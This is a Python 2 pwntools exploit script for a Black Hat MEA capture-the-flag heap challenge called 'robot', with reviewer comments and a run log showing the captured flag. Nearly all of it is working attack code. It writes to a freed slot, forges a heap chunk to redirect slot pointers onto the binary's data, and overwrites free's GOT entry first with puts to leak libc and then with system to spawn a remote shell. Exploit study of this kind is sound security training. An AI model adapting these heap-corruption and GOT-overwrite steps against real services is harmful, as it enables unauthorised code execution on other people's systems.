@soez
Created October 1, 2022 21:06
Black Hat MEA CTF
from pwn import *
# Target selector read when the connection is opened further down:
# False -> remote challenge host, True -> spawn ./main as a local process.
local = False

# Parsed images of the challenge binary and the glibc 2.27 build shipped with
# it; used below to look up GOT/PLT entries and libc symbols by name.
# checksec=False skips pwntools' mitigation summary on load.
binary = ELF("./main", checksec=False)
libc = ELF("./libc-2.27.so", checksec=False)
def menu(n):
    """Wait for the service's "> " prompt and answer it with option *n*.

    The choice is sent as decimal text followed by a newline. Uses the
    module-level tube ``io``.
    """
    choice = str(n)
    io.recvuntil("> ")
    io.sendline(choice)
def new_robot(sz):
    """Pick menu option 1 and request a robot with *sz* bytes of memory.

    The size is sent as decimal text WITHOUT a trailing newline, then one
    response line is consumed so the next prompt starts clean.
    """
    menu(1)
    size_text = str(sz)
    io.recvuntil("Provide robot memory size:\n")
    io.send(size_text)
    # Discard the service's one-line reply to the allocation request.
    io.recvline()
def program_robot(slot, s):
    """Pick menu option 2 and write the raw bytes *s* into robot *slot*.

    Both the slot index (decimal text) and the payload are sent without a
    trailing newline, so exactly the bytes in *s* reach the service.
    """
    menu(2)
    slot_text = str(slot)
    io.recvuntil("Provide robot's slot:\n")
    io.send(slot_text)
    io.recvuntil("Program the robot:\n")
    io.send(s)
def destroy_robot(slot):
    """Pick menu option 3 and ask the service to destroy robot *slot*.

    The slot index is sent as decimal text without a trailing newline.
    NOTE(review): presumably this maps to free() on the slot's buffer in the
    target -- confirm against the binary.
    """
    menu(3)
    slot_text = str(slot)
    io.recvuntil("Provide robot's slot:\n")
    io.send(slot_text)
# Driver for the "robot" CTF service (Python 2 + pwntools).
#
# Reviewer annotations: every statement about the target's memory layout is
# inferred from the payloads in this script, not from the binary, and is
# marked as such. What the script visibly depends on, and the hardening that
# would break each dependency:
#   * a slot is written to after it was destroyed -> clearing the slot
#     pointer on destroy and rejecting writes to dead slots removes the
#     primitive;
#   * fixed 0x4040xx addresses and GOT entries are used without any leak of
#     the binary's base -> presumably a non-PIE build; PIE would invalidate
#     the constants;
#   * function pointers are written into the GOT -> presumably partial or no
#     RELRO; full RELRO makes the GOT read-only.

# Connect: spawn the local binary when `local` is set, otherwise open a TLS
# connection (port 443, SNI equal to the host name) to the challenge server.
io = process(binary.path) if local else remote("blackhat3-8b7d24997231efceb15074a115c75131-0.chals.bh.ctf.sa", 443, ssl=True, sni="blackhat3-8b7d24997231efceb15074a115c75131-0.chals.bh.ctf.sa")

# Fixed address inside the binary that the forged pointers below are built
# around. NOTE(review): the name and the later writes to 0x404100 suggest it
# sits next to the service's global slot table -- confirm.
bss = 0x4040f0

# Two allocations of the same size; they become slots 0 and 1.
# NOTE(review): presumably adjacent on the heap -- confirm.
new_robot(0x868)
new_robot(0x868)

# Slot 0 is destroyed and then programmed anyway: the script relies on the
# service still accepting a write to a destroyed slot.
destroy_robot(0)
# Payload layout: two 8-byte words (0, 0x861), two pointers into the binary
# (bss - 8, bss), 0x840 zero bytes, then a 2-byte 0x860.
# NOTE(review): this looks like a forged glibc chunk header followed by a
# forged prev_size for the neighbouring chunk -- confirm.
program_robot(0, p64(0) + p64(0x861) + p64(bss - 8) + p64(bss) + p64(0)*(0x840 // 8) + p16(0x860))
# NOTE(review): destroying slot 1 presumably makes the allocator consolidate
# with the forged chunk, leaving a slot pointer aimed at the binary's own
# data instead of the heap -- confirm.
destroy_robot(1)

# From here on the values written are 0x4040xx addresses and GOT entries,
# i.e. the writes are presumably landing on the service's bookkeeping.
# 24 bytes of dword 1, then the address 0x404100.
program_robot(0, p32(1)*6 + p64(0x404100))
# Three pointers: free's GOT entry, 0x4040c8, atoi's GOT entry.
# NOTE(review): presumably these become the pointers for slots 0, 1 and 2.
program_robot(0, p64(binary.got['free']) + p64(0x4040c8) + p64(binary.got['atoi']))
# Writes the address of puts@plt through slot 0. If slot 0 now points at
# free's GOT entry, the service's next free() call runs puts() instead.
program_robot(0, p64(binary.plt['puts']))
# Destroying slot 2 is the leak trigger: the bytes that come back are
# treated as a libc address on the next line.
destroy_robot(2)

# 6 received bytes, zero-padded to 8 and unpacked little-endian, minus a
# fixed offset gives the libc load address.
# NOTE(review): 0x40670 is presumably atoi's offset in libc-2.27.so;
# libc.sym['atoi'] would replace the magic number -- confirm.
libc.address = u64(io.recv(6).ljust(8, '\0')) - 0x40670
print "[+] Base libc: 0x%x" % libc.address
# With libc.address set, pwntools resolves both lookups to runtime addresses.
system = libc.sym['system']
# .next() is the Python 2 iterator protocol: first "/bin/sh" match in libc.
bin_sh = libc.search("/bin/sh").next()
print "[+] system: 0x%x" % system
print "[+] bin_sh: 0x%x" % bin_sh

# 24 bytes of dword 0x800, 32 bytes of dword 1, then free's GOT entry and
# the address 0x404118, written through slot 1.
# NOTE(review): presumably this rewrites the slot bookkeeping so slot 0 is
# free's GOT entry again and slot 1 is 0x404118 -- confirm.
program_robot(1, p32(0x800)*6 + p32(0x1)*8 + p64(binary.got['free']) + p64(0x404118))
# Second write of a function address through slot 0, this time system().
program_robot(0, p64(system))
# Stores the address of libc's "/bin/sh" string through slot 1.
program_robot(1, p64(bin_sh))
# NOTE(review): destroying slot 3 presumably ends in system("/bin/sh") on
# the server, given the two writes above -- confirm.
destroy_robot(3)

# Send one command to the resulting session, print whatever comes back, and
# close the connection.
io.sendline("/bin/cat flag.txt")
print io.recv()
io.close()
'''
noname@ubuntu:~/robot$ python2 robot.py
[+] Opening connection to blackhat3-8b7d24997231efceb15074a115c75131-0.chals.bh.ctf.sa on port 443: Done
[+] Base libc: 0x7f3c859dd000
[+] system: 0x7f3c85a2c420
[+] bin_sh: 0x7f3c85b90d88
BlackHatMEA{1421:23:1ff139d950b321dbb9bf6dc51327d7bd9ad1c4b2}
[*] Closed connection to blackhat3-8b7d24997231efceb15074a115c75131-0.chals.bh.ctf.sa port 443
'''